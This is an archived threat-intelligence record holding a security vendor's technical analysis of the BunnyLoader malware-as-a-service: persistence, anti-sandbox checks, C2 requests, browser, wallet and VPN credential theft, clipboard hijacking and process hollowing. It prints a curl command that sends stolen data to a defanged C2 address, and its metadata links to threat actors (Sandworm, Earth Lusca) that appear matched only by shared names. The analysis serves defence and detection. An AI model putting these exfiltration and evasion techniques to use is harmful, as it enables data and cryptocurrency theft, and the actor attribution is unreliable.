{ "id": "45c91e7a-3a24-4f68-9f97-b5a62710a3b2", "created_at": "2026-04-06T00:11:16.865041Z", "updated_at": "2026-04-10T03:37:09.116225Z", "deleted_at": null, "sha1_hash": "9ea30f552e9f31c5cf5c9f7bc1087ede8053274d", "title": "BunnyLoader | ThreatLabz", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1020193, "plain_text": "BunnyLoader | ThreatLabz\r\nBy Niraj Shivtarkar, Satyam Singh\r\nPublished: 2023-09-29 · Archived: 2026-04-05 16:55:08 UTC\r\nTechnical Analysis\r\nIn the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the\r\nloader performs the following actions:\r\n1. Creates a new registry value named “Spyware_Blocker” in the Run registry key\r\n(HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) where the value is\r\nthe path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the\r\nmachine.\r\n2. Hides the window using ShowWindow() with nCmdShow as SW_HIDE\r\n3. Creates a mutex name “BunnyLoader_MUTEXCONTROL” via CreateMutexW()\r\n4. Performs the following anti-VM techniques:\r\nChecks for the following modules:\r\nSxIn.dll - 360 Total Security\r\ncmdvrt32.dll / cmdvrt64.dll - Comodo Antivirus\r\nwine_get_unix_file_name - Detects Wine \r\nSbieDll.dll - Sandboxie\r\nChecks for a VM using “ROOT\\CIMV2” queries:\r\nSELECT * FROM Win32_VideoController\r\nWin32_Processor\r\nWin32_NetworkAdapter \r\nWin32_BIOS \r\nSELECT * FROM Win32_ComputerSystem\r\nChecks for a Docker container via “/proc/1/cgroup” - if the container exists, BunnyLoader does not\r\nperform further malicious actions.\r\nChecks for the following blacklisted sandbox usernames:\r\nANYRUN\r\nSandbox\r\nTest\r\nJohn Doe\r\nAbby\r\nTimmy\r\nMaltest\r\nmalware\r\nEmily\r\nTimmy\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 1 of 9\n\nPaul Jones\r\nCurrentUser\r\nIT-ADMIN\r\nWalker\r\nLisa\r\nWDAGUtilityAccount\r\nVirus\r\nfred\r\nIf a sandbox is identified, BunnyLoader throws the following error message: \r\n“The version of this file is not compatible with the current version of Windows you are running. Check your\r\ncomputer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and\r\nthen contact the software publisher.”\r\nOtherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:\r\nGET /Bunny/Add.php?country=\u0026ip=\u0026host=\u0026ver=2.0\u0026system=Microsoft+Windows+10+Pro%0A\u0026privs=Admin\u0026av=Windows+Defende\r\nUser-Agent: BunnyLoader\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Mon, 25 Sep 2023 21:11:41 GMT\r\nServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4\r\nX-Powered-By: PHP/8.2.4\r\nContent-Length: 11\r\nContent-Type: text/html; charset=UTF-8\r\nConnected\r\nThe registration request sent to the C2 server (shown above) contains the following information:\r\nInformation in C2 server request\r\nValue Description\r\ncountry\r\nGathers the country where the infected system is connecting from via “http[:]//ip-api.com/csv”\r\nwhere the user agent is “BunnyRequester”\r\nip Gathers the victim IP from “http[:]//api.ipify.org” where the user agent is “BunnyRequester”\r\nhost Gathers the hostname via GetComputerNameA\r\nver The version of BunnyLoader (e.g., 2.0)\r\nsystem Fetches the operating system via “systeminfo | findstr /B /C:\"OS Name”\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 2 of 9\n\nValue Description\r\nprivs\r\nFetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an\r\nadministrator or sends the string “user”.\r\nav\r\nGathers the anti-virus on the infected machine via wmic /namespace:\\\\root\\SecurityCenter2 path\r\nAntiVirusProduct get displayName /value\r\nThe user agent for the request is set to “BunnyLoader”. If the response from the C2 is “Connected”,\r\nBunnyLoader performs the core malicious actions.\r\nTask Execution\r\nAfter registration, BunnyLoader sends a task request to the C2 server\r\n“http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=” with the user agent as “BunnyTasks”. As shown\r\nbelow, the response to the task request consists of the “ID”, “Name” and “Params”.\r\nGET /Bunny/TaskHandler.php?BotID= HTTP/1.1\r\nUser-Agent: BunnyTasks\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Mon, 25 Sep 2023 21:11:41 GMT\r\nServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4\r\nX-Powered-By: PHP/8.2.4\r\nContent-Length: 102\r\nContent-Type: text/html; charset=UTF-8\r\nID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc15k\r\nHere the \"Name\" is the module (functionality) to be executed and the “params” are the parameters passed to the\r\nmodule. Based on the module name received in the task response, BunnyLoader further performs its actions.\r\nBunnyLoader consists of the following tasks:\r\nTrojan Downloader\r\nDownload and Execute (Fileless Execution)\r\nDownload and Execute (Disk Execution)\r\nIntruder\r\nRun Keylogger\r\nRun Stealer\r\nClipper\r\nBitcoin\r\nMonero\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 3 of 9\n\nEthereum\r\nLitecoin\r\nDogecoin\r\nZCash\r\nTether\r\nRemote Command Execution\r\nRun Keylogger Task\r\nBunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging key strokes. The output of\r\nthe keylogger is stored in the file “C:\\Users\\\\AppData\\Local\\Keystrokes.txt”.\r\nRun Stealer Task\r\nBunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much\r\nmore. Eventually the stolen information is stored in a folder named “BunnyLogs” in the Appdata\\Local Directory,\r\nwhich is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers\r\ntargeted by BunnyLoader:\r\n7Star\\7Star\\User Data\r\nYandex\\YandexBrowser\\User Data\r\nCentBrowser\\User Data\r\nComodo\\User Data\r\nChedot\\User Data\r\n360Browser\\Browser\\User Data\r\nVivaldi\\User Data\r\nMaxthon3\\User Data\r\nKometa\\User Data\r\nK-Melon\\User Data\r\nElements Browser\\User Data\r\nGoogle\\Chrome\\User Data\\\\Sputnik\\Sputnik\\User Data\r\nEpic Privacy Browser\\User Data\r\nNichrome\\User Data\r\nuCozMedia\\Uran\\User Data\r\nCocCoc\\Browser\\User Data\r\nFenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\r\nUran\\User Data\r\nCatalinaGroup\\Citrio\\User Data\r\nChromodo\\User Data\r\nCoowon\\Coowon\\User Data\r\nMail.Ru\\Atom\\User Data\r\nliebao\\User Data\r\nMicrosoft\\Edge\\User Data\r\nQIP Surf\\User Data\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 4 of 9\n\nBraveSoftware\\Brave-Browser\\User Data\r\nOrbitum\\User Data\r\nChromium\\User Data\r\nComodo\\Dragon\\User Data\r\nGoogle(x86)\\Chrome\\User Data\r\nAmigo\\User\\User Data\r\nMapleStudio\\ChromePlus\\User Data\r\nTorch\\User Data\r\nIridium\\User Data\r\nBunnyLoader steals following information from these web browsers:\r\nAutoFill data\r\nCredit cards\r\nDownloads\r\nHistory\r\nPasswords\r\nThe malware targets the following cryptocurrency wallets:\r\nArmory\r\nExodus\r\nAutomaticWallet\r\nBytecoin\r\nEthereum\r\nCoinomi\r\nJaxx\r\nElectrum\r\nGuarda\r\nBunnyLoader steals credentials from the following VPN clients:\r\nProtonVPN \r\nOpenVPN\r\nCredentials are also stolen from following messaging applications:\r\nSkype\r\nTox\r\nSignal\r\nElement\r\nICQ\r\nExamples of the stolen information are shown in the figure below. The logs consist of an information.txt file\r\nwhich contains system information along with the information related to the location of the infected machine.\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 5 of 9\n\nEach folder contains the corresponding data stolen from the system. For example, the Browser folder contains the\r\nweb browser history and downloaded file information.\r\nFigure 5: A screenshot of the information exfiltrated by BunnyLoader.\r\nThe stolen data is archived using the Powershell cmdlet: System.IO.Compression.ZipFile with the filename\r\n“BunnyLogs_.zip”. The ZIP archive is exfiltrated to the C2 server via the following CURL command:\r\ncmd.exe /c curl -F\r\n\"file=@C:\\Users\\user\\AppData\\Local\\BunnyLogs_468325.zip\"\r\nhttp[:]//37[.]139[.]129[.]145/Bunny/Uploader.php\r\nBunnyLoader also performs a stealer registration request containing statistics related to the stolen information and\r\nthe link to the exfiltrated logs with the user agent: “BunnyStealer”, as shown below:\r\nGET /Bunny/StealerRegistration.php?country=\u0026ip=\u0026system=Micro\r\nsoft+Windows+10+Pro%0A\u0026chromium=18\u0026crypto=1\u0026messages=0\u0026vpn=0\u0026keys=0\u0026lin\r\nk=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_\r\n468325.zip\u0026date=Mon+Sep+25+21%3A47%3A41+2023%0A\u0026games=0 HTTP/1.1\r\nUser-Agent: BunnyStealer\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nClipper Task\r\nThe BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and\r\nreplaces them with a wallet address controlled by the threat actor.\r\nIn this case, the targeted cryptocurrencies are: \r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 6 of 9\n\nBitcoin\r\nMonero\r\nEthereum\r\nLitecoin\r\nDogecoin\r\nZCash\r\nTether\r\nThe clipper receives the cryptocurrency wallet addresses to replace from the C2 server.\r\nDownload and Execute Task\r\nBunnyLoader performs two types of download and execute functions. \r\nThe first type is downloading a file from a URL provided by the C2, which is written to disk in the\r\nAppData\\Local directory and further executed. \r\nThe second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a\r\nsuspended state and then downloads the payload from the received URL with the user agent\r\n“BunnyLoader_Dropper”. The downloaded binary is stored in a memory buffer and BunnyLoader\r\nperforms Process Hollowing to inject the downloaded payload into the “notepad.exe” process as shown in\r\nthe figure below.\r\nFigure 6: A screenshot of BunnyLoader fileless download and executing code.\r\nAfter the tasks are completed, BunnyLoader sends the following task completion request with the user agent as\r\n“TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below:\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 7 of 9\n\nhttp://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5\u0026BotID=272148461\r\nRemote Command Execution Task\r\nBunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to\r\nbe executed on the infected machine via an “echoer” request to C2 server (e.g.,\r\nhttp[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to “BunnyTasks” as shown in the\r\nfigure below. BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and\r\nthen executes the command using _popen and the command output is been sent across to the C2 server as the\r\n“\u0026value=” parameter in a result command request: (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php)\r\nwith the user agent: “BunnyShell”.\r\nFigure 7: A screenshot of BunnyLoader remote command execution.\r\nBunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as\r\nshown below. The user agent for the heartbeat is “HeartBeat_Sender”.\r\nGET /Bunny/Heartbeat.php?country=\u0026ip=\u0026host=\u0026ver=2.0\u0026system=Microsoft+Windows+10+Pro%0A\u0026privs=Admin\u0026av=Windows+D\r\nUser-Agent: HeartBeat_Sender\r\nHost: 37[.]139[.]129[.]145\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Mon, 25 Sep 2023 21:11:41 GMT\r\nServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4\r\nX-Powered-By: PHP/8.2.4\r\nContent-Length: 13\r\nContent-Type: text/html; charset=UTF-8\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 8 of 9\n\nClient online\r\nWeitere Zscaler-Blogs erkunden\r\nSource: https://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nhttps://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.zscaler.de/blogs/security-research/bunnyloader-newest-malware-service" ], "report_names": [ "bunnyloader-newest-malware-service" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434276, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9ea30f552e9f31c5cf5c9f7bc1087ede8053274d.pdf", "text": "https://archive.orkl.eu/9ea30f552e9f31c5cf5c9f7bc1087ede8053274d.txt", "img": "https://archive.orkl.eu/9ea30f552e9f31c5cf5c9f7bc1087ede8053274d.jpg" } }